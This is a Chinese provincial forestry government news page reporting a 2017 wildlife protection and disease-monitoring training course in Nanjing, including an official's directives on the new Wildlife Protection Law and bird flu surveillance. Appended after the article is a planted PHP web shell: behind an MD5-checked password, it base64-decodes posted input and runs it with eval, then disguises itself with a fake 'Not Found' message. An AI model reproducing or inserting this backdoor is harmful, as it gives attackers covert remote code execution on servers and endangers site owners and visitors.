政务公开

首页 > 政务公开 >

    全省野生动物保护暨疫源疫病监测防控培训班在南京举办

           2017年9月25-27日,全省野生动物保护暨疫源疫病监测防控培训班在南京举办。省林业局卢兆庆副局长出席开班式并部署全省秋冬季野生动物保护执法与疫病监测防控工作。

      培训班组织对新修订的《野生动物保护法》、野生动物(特别是鸟类)识别、野生动物疫源疫病监测防控、新媒体时代野生动物网络舆情处置和执法案例等方面进行深入地解读、剖析和全面学习。
      卢兆庆强调,新修订的《中华人民共和国野生动物保护法》已于今年1月1日起施行。各级林业主管部门要深刻认识立法修订野生动物保护法对进一步加强野生动物保护、推进生态文明建设具有重要的历史意义,把贯彻实施新修订的野生动物保护法作为当前和今后一段时期野生动物保护工作的重要任务,从学习培训、宣传教育、配套法规制度建设、执法监管等各个方面入手,多头推进新法的贯彻执行。各地要广泛开展各种形式的宣传教育活动,营造良好的社会氛围,全面提高全社会依法保护野生动物的法制观念和意识。要密切关注和监测野生动物舆情动态,对公众关心的野生动物保护热点和焦点问题及时回应和解说,积极有效争取公众和社会各界的理解和支持。
      卢兆庆要求,各级林业部门要切实做好野生动物疫病监测防控工作。去冬今春以来,我省以H7N9为主的禽流感疫情总体形势比较严峻。每年秋冬季都是我省野生动物疫病易发、多发季节。各地要高度重视,提高对野生动物疫源疫病监测防控工作的认识,强化大局意识、责任意识、风险意识和忧患意识,完善领导责任制和责任追究制度,将工作明确到人,确保监测工作顺利开展。要切实加强监测能力和网络体系建设,购置必备防控物资,加强站点监测能力。要科学开展疫源疫病监测防控,科学设置观测点和巡查线路,明确监测重点区域和重要时期,强化重点时期的监测巡护力度。同时,要落实工作责任和监测人员,确保人员全面到岗到位监测,确保第一时间发现、第一现场处理。
      卢兆庆还就我省林业系统自然保护区生态环境问题整改工作进行部署,要求各地按照“缺什么、补什么”的基本原则认真抓好问题整改,并就规划编制、责任主体和管理机构等重点工作进行部署,提出明确要求。
      各市、县(市、区)从事野生动物保护及疫源疫病监测的工作人员,各国家级、省级疫源疫病监测站技术骨干,各市野保(林业、湿地)站(处)站长共110人参加了培训。
"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>